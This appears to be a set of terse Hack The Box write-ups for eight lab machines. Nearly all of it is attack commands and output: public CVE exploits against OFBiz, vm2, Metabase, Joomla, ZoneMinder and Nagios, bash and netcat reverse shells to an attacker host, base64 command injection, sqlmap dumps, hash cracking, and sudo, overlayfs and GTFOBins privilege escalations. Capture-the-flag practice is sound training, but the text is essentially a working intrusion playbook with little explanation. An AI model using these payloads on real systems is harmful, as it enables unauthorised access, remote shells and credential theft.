HTB-Writeups -
bizness
echo "RHOST bizness.htb" >> /etc/hosts
nmap -p- --open IP -sV -v
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp open http nginx 1.18.0
443/tcp open ssl/http nginx 1.18.0
46027/tcp open tcpwrapped
ffuf -w wordlists/dicc.txt -u https://bizness.htb/FUZZ -mc 200
index.html
control/
control
solr/admin/file/?file=solrconfig.xml
solr/admin/
control/login
git clone https://github.com/mickdec/Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz
nc -nlvp 4444
python3 Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz/ofbiz_exploit.py
https://bizness.htb/ shell LHOST:4444
python3 -c 'import pty;pty.spawn("/bin/bash")'
cat /opt/ofbiz/framework/resources/templates/AdminUserLoginData.xml
grep -irE '(password|pwd|pass)[[:space:]]*=[[:space:]]*[[:alpha:]]+' *
grep --color=auto -rnw -iIe "PASSW\|PASSWD\|PASSWORD\|PWD" --color=always 2>/dev/null
HTB-Writeups -
codify
10.10.11.239/codify.htb
ping 10.10.11.239
nmap -p- --open -v -sV 10.10.11.239
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52
3000/tcp open http Node.js Express framework
edit /etc/hosts
10.10.11.239 codify.htb
about us > The vm2 library > CVE-2023-32314
https://github.com/advisories/GHSA-cchq-frgv-rjh5
https://gist.github.com/leesh3288/f693061e6523c97274ad5298eb2c74e9
const {VM} = require("vm2");const vm = new VM();const code = `err = {};const handler =
{getPrototypeOf(target) {(function stack() {new Error().stack;stack();})();}};const proxiedErr = new
Proxy(err, handler);
try {throw proxiedErr;
} catch ({constructor: c}) {
let cmd = "ls -al";
c.constructor('return process')().mainModule.require('child_process').execSync(cmd);}`
console.log(vm.run(code));
ssh-keygen -t rsa -b 4096 -f x.key
cat x.key.pub
const {VM} = require("vm2");const vm = new VM();const code = `err = {};const handler =
{getPrototypeOf(target) {(function stack() {new Error().stack;stack();})();}};const proxiedErr = new
Proxy(err, handler);
try {throw proxiedErr;
} catch ({constructor: c}) {
let cmd = "ls -al;mkdir .ssh;echo 'ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAACAQDW+RGnsmYGrsgCL/u0+NSnoevC+okNP2gN/iSjtN28Y0mxe4/eEgRsrgNRY5fryZT4Ml1kBdo9qil0QskwjhoFK1YFDw8BIJaSYuN0922fx3HNLWIo2tk2k3px74uR76FFryZeem2fyBIIjKiTRjVeNFVH8qSwboUhfzfWgqOnvuhuu4U7LFVyZ8KboAUE3BS4DEW+sqPnb2ECNGLiyb6AjzAr2C6j3YBty9d2P+e4BU92C9CfB+e/CRDXon/Hf4KRoif4ez2KwUZQk33z3x4AOz/W+O15f2G5DDNW8oJNcEB3eHrFyiP83bkt2u1bPcExBO+9f2CpEv2zTvHgkjfjSI1xKsuLJHYJWXberraNr4WiiQed/0KtCTsz3yVMeeVUu7I+IG4BmeNHjkVwkotgf8OsWTFRYAZ/0A4L/pbSKSRvtwHSvRA/uwxhkdSTg6YfoygK97bSXLHzgZUenVyOlPIPH2yl2OW7uXkwfBADJ92WZnMOWg9/u16zvLgmh3asCxnggKdZRAVHG3YOhtFsOTYTZRlLcY02sSkBgFjnCgdr2DTwEiitGn32Ha5IfCg7pXwEuwEmQcOilLxU0MOuoebB8s6ovi/xAkEpUc8HgZ1kVhLd3V6UJeI9tbIGCb06YvRtv4gggTe8CMow1mY+oufmEFntl2DyTkcpw+si6w=='
> ~/.ssh/authorized_keys";
c.constructor('return process')().mainModule.require('child_process').execSync(cmd);}`
console.log(vm.run(code));
ssh svc@10.10.11.239 -i x.key
cat /var/www/contact/tickets.db
joshua
$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2
.\hashcat.exe -a 0 -m 3200 x rockyou.txt
ssh joshua@10.10.11.239
cat user.txt
sudo -l
cat /opt/scripts/mysql-backup.sh
import string
import os
def check_password(p):
os.system(f"echo '{p}*' | sudo /opt/scripts/mysql-backup.sh > RES")
f = open("RES","r")
result = f.readlines()
f.close()
if "Password confirmed!" in result:
return 1
else:
return 0
charset = string.ascii_letters + string.digits
end_p = ""
notfnd = True
while notfnd:
for char in charset:
os.system(f"echo '{end_p + char}*' | sudo /opt/scripts/mysql-backup.sh > RES")
f = open("RES","r")
result = f.readlines()
f.close()
print(end_p)
if not "Password confirmation failed!" in result[1]:
end_p += char
python3 x.py
su
HTB-Writeups -
analytics
10.10.11.233/analytical.htb
ping 10.10.11.233
nmap -p- --open -v -sV 10.10.11.233
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
edit /etc/hosts
10.10.11.233 analytical.htb
10.10.11.233 data.analytical.htb
CVE-2023-38646
https://github.com/m3m0o/metabase-pre-auth-rce-poc
http://data.analytical.htb/api/session/properties
setup-token "249fa03d-fd94-4d5b-b94f-b4ebf3df681f"
nc -nlvp 4444
python3 main.py -u http://data.analytical.htb -t 249fa03d-fd94-4d5b-b94f-b4ebf3df681f -c "bash -i >&
/dev/tcp/LHOST/4444 0>&1"
cat /proc/self/environ
metalytics:An4lytics_ds20223#
ssh metalytics@analytical.htb
cat user.txt
uname -a
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2
x86_64 x86_64 x86_64 GNU/Linux
https://www.crowdstrike.com/blog/crowdstrike-discovers-new-container-exploit/
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t
overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;import
pty;os.setuid(0);pty.spawn("/bin/bash")'
cat /root/root.txt
HTB-Writeups -
surveillance
10.10.11.245/surveillance.htb/
edit /etc/hosts
10.10.11.245 surveillance.htb
ping 10.10.11.245
nmap -p- -sV -v 10.10.11.245
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
https://gist.github.com/to016/b796ca3275fa11b5ab9594b1522f7226
nc -nlvp 4444
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc LHOST 4444 >/tmp/f
unzip /html/craft/storage/backups/surveillance--2023-10-17-202801--v4.4.14.sql.zip
cat surveillance--2023-10-17-202801--v4.4.14.sql | grep 'users'
admin','Matthew
B','Matthew','B','admin@surveillance.htb','39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec'
hashcat -m 1400 p rockyou.txt
matthew:starcraft122490
ssh matthew@10.10.11.245
netstat -ntlp
8080 LISTEN
https://github.com/rvizx/CVE-2023-26035
ssh -L 8081:localhost:8080 matthew@10.10.11.245
nc -nlvp 4445
python3 exploit.py -t http://localhost:8081/ -ip LHOST -p 4445
python3 -c 'import pty;pty.spawn("/bin/bash")'
nc -nlvp 4444
sudo -v
sudo zmupdate.pl --version=1 --user=';$(rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 |
nc LHOST 4444 >/tmp/f)'
HTB-Writeups -
devvortex
10.10.11.242/devvortex.htb
ping 10.10.11.242
edit /etc/hosts
10.10.11.242 devvortex.htb
nmap -p- --open -sV -v 10.10.11.242
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
ffuf -u http://devvortex.htb/ -w Desktop/wordlists/dns.txt -H "Host: FUZZ.devvortex.htb" -mc 0-299
dev [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 306ms]
edit /etc/hosts
10.10.11.242 dev.devvortex.htb
ffuf -u http://dev.devvortex.htb/FUZZ -w Desktop/wordlists/dicc.txt -mc 0-299
administrator/ [Status: 200, Size: 12211, Words: 2022, Lines: 194, Duration: 1466ms]
https://github.com/Acceis/exploit-CVE-2023-23752/blob/master/exploit.rb
http://dev.devvortex.htb/api/index.php/v1/users?public=true
lewis
logan
http://dev.devvortex.htb/api/index.php/v1/config/application?public=true
lewis:P4ntherg0t1n5r3c0n##
http://dev.devvortex.htb/administrator/
http://dev.devvortex.htb/administrator/index.php?option=com_templates&view=template&id=222&file=aG9tZQ==
new file> sh.php>
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
nc -nlvp 4444
http://dev.devvortex.htb/administrator/templates/atum/sh.php
python3 -c 'import pty;pty.spawn("/bin/bash")'
mysql -u lewis -p
use joomla;
select * from sd4fg_users;
logan:$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12
hashcat -m 3200 hash rockyou.txt
logan:tequieromucho
ssh logan@10.10.11.242
cat /home/logan/user.txt
sudo -l
cat /usr/bin/apport-cli
https://gtfobins.github.io/gtfobins/vi/#shell
sudo apport-cli -f
1>2>V>!/bin/sh
cat /root/root.txt
HTB-Writeups -
cozyhosting
10.10.11.230/CozyHosting
ping 10.10.11.230
edit /etc/hosts
10.10.11.230 cozyhosting.htb
nmap -p- --open -sV -v 10.10.11.230
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
ffuf -u http://cozyhosting.htb/FUZZ -w Desktop/wordlists/dicc.txt -mc 0-299 -fs 0
actuator [Status: 200, Size: 634, Words: 1, Lines: 1, Duration: 40ms]
actuator/env [Status: 200, Size: 4957, Words: 120, Lines: 1, Duration: 42ms]
actuator/mappings [Status: 200, Size: 9938, Words: 108, Lines: 1, Duration: 142ms]
actuator/beans [Status: 200, Size: 127224, Words: 542, Lines: 1, Duration: 80ms]
actuator/health [Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 226ms]
actuator/sessions [Status: 200, Size: 148, Words: 1, Lines: 1, Duration: 221ms]
index [Status: 200, Size: 12706, Words: 4263, Lines: 285, Duration: 205ms]
login [Status: 200, Size: 4431, Words: 1718, Lines: 97, Duration: 48ms]
http://cozyhosting.htb/actuator/sessions
08EF47D7E71ACE1ABBBF204F8E9726FF "kanderson"
http://cozyhosting.htb/actuator/mappings
"{POST [/executessh]}"
/admin
edit cookies
http://cozyhosting.htb/admin
POST http://cozyhosting.htb/executessh
host=10.10.11.230
username=x;`{cat,/etc/passwd}`
echo 'bash -i -p >& /dev/tcp/LHOST/4444 0>&1'|base64
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=
echo${IFS}xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=|base64${IFS}-d|bash
nc -nlvp 4444
POST http://cozyhosting.htb/executessh
host=10.10.11.230&username=x;`echo%24%7BIFS%7Dxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=%7Cbase64%24%7BIFS%7D-d%7Cbash`
python3 -m http.server 8888
wget http://10.10.11.230:8888/cloudhosting-0.0.1.jar
unzip cloudhosting-0.0.1.jar
grep -irE '(password|pwd|pass)[[:space:]]*=[[:space:]]*[[:alpha:]]+' *
BOOT-INF/classes/application.properties:spring.datasource.password=Vg&nvzAQ7XxR
cat BOOT-INF/classes/application.properties
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR
python3 -c 'import pty;pty.spawn("/bin/bash")'
psql -h localhost -U postgres
\l
q
\c cozyhosting
\dt
q
select * from users;
\q
kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
admin | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin
hashcat -m 3200 hash rockyou.txt
$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited
ls /home/
josh
ssh josh@10.10.11.230
cat /home/josh/user.txt
sudo -l
https://gtfobins.github.io/gtfobins/ssh/#sudo
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
cat /root/root.txt
HTB-Writeups -
keeper
10.10.11.227/keeper.htb
ping 10.10.11.227
edit /etc/hosts
10.10.11.227 keeper.htb
10.10.11.227 tickets.keeper.htb
nmap -p- --open -sV 10.10.11.227
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
ffuf -u http://tickets.keeper.htb/ret/FUZZ -w Desktop/wordlists/dicc.txt -mc 0-299 -fs 0
index.html [Status: 200, Size: 4236, Words: 407, Lines: 154, Duration: 373ms]
m [Status: 200, Size: 2309, Words: 247, Lines: 112, Duration: 444ms]
https://www.google.com/search?client=firefox-b-e&q=request+tracker+default+credentials
root:password
http://tickets.keeper.htb/rt/Admin/Users/
http://tickets.keeper.htb/rt/Admin/Users/Modify.html?id=27
lnorgaard:Welcome2023!
ssh lnorgaard@10.10.11.227
cat users.txt
python3 -m http.server 8888
wget http://10.10.11.227:8888/RT30000.zip
unzip RT30000.zip
wget https://raw.githubusercontent.com/matro7sh/keepass-dump-masterkey/main/poc.py
python3 poc.py KeePassDumpFull.dmp
rødgrød med fløde
https://app.keeweb.info
root:F4><3K0nd!
edit /x.key rsa file
puttygen x.key -O private-openssh -o id-rsa
ssh -i id-rsa root@10.10.11.227
cat root.txt
HTB-Writeups -
monitored
10.10.11.248/nagios.monitored.htb
ping 10.10.11.248
edit /etc/hosts
10.10.11.248 nagios.monitored.htb
nmap -p- --open -sV -v 10.10.11.248
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp open http Apache httpd 2.4.56
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
443/tcp open ssl/http Apache httpd 2.4.56 ((Debian))
5667/tcp open tcpwrapped
ldapsearch -H ldap://nagios.monitored.htb:389
nmap -p 161 --open -sU -v 10.10.11.248
snmpbulkwalk -c public -v2c 10.10.11.248 .
svc:XjH7VCehowpR1xZB
openldap
shellinabox
ffuf -u https://nagios.monitored.htb/nagiosxi/FUZZ -w /root/Desktop/wordlists/dicc.txt -mc 0-299 -fs
0
api/v1/swagger.json [Status: 200, Size: 32, Words: 4, Lines: 2, Duration: 135ms]
api/v1/ [Status: 200, Size: 32, Words: 4, Lines: 2, Duration: 199ms]
api/v1/swagger.yaml [Status: 200, Size: 32, Words: 4, Lines: 2, Duration: 205ms]
backend/ [Status: 200, Size: 108, Words: 4, Lines: 5, Duration: 117ms]
login.php [Status: 200, Size: 26575, Words: 5452, Lines: 467, Duration: 118ms]
terminal [Status: 200, Size: 5215, Words: 1247, Lines: 124, Duration: 75ms]
ffuf -u https://nagios.monitored.htb/nagiosxi/api/v1/FUZZ -w /root/Desktop/wordlists/dicc.txt -mc
0-299 -fs 32
authenticate [Status: 200, Size: 53, Words: 7, Lines: 2, Duration: 6891ms]
https://www.nagios.org/ncpa/help/2.2/api.html
curl -XPOST -k -L 'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate?pretty=1' -d
'username=svc&password=XjH7VCehowpR1xZB&valid_min=60'
https://nagios.monitored.htb/nagiosxi/account/
2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK
sqlmap -u
"https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=138aa9a02fc57037e422a8a2333af89fe1790014"
-p id
sqlmap -u
"https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3"
--cookie="nagiosxi=qdb15i3ol65q7iv055ump1oqr6" --method POST --dump --drop-set-cookie --technique=ET
--dbms=MySQL -p id --risk=3 --level=5 --threads=10
| 1 | admin@monitored.htb | Nagios Administrator |
IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL | 1 |
$2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C | nagiosadmin | 0 | 1701931372 | 1 |
1701427555 | 0 | 1706643300 | IoAaeXNLvtDkH5PaGqV2XZ3vMZJLMDR0 | 5 | 2 | 1701427555 |
| 2 | svc@monitored.htb | svc | 2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK | 0
| $2a$10$12edac88347093fcfd392Oun0w66aoRVCrKMPBydaUfgsgAOUHSbK | svc | 1 | 1699724476 | 1 | 1699728200 |
1699634403 | 1706647188 | 6oWBPbarHY4vejimmu3K8tpZBNrdHpDgdUEs5P2PFZYpXSuIdrRMYgk66A0cjNjq | 1
curl -POST -k
"https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1"
-d "username=nadmin&password=nadmin&name=nadmin&email=newadmin@monitored.htb&auth_level=admin"
nadmin:nadmin
https://nagios.monitored.htb/nagiosxi/includes/components/ccm/xi-index.php
nc -nlvp 4444
bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
cat user.txt
python3 -c 'import pty;pty.spawn("/bin/bash")'
echo '#!/bin/bash' > /usr/local/nagios/bin/npcd
echo 'bash -i >& /dev/tcp/10.10.14.5/4445 0>&1' >> /usr/local/nagios/bin/npcd
chmod +x /usr/local/nagios/bin/npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh restart npcd
cat /root/root.txt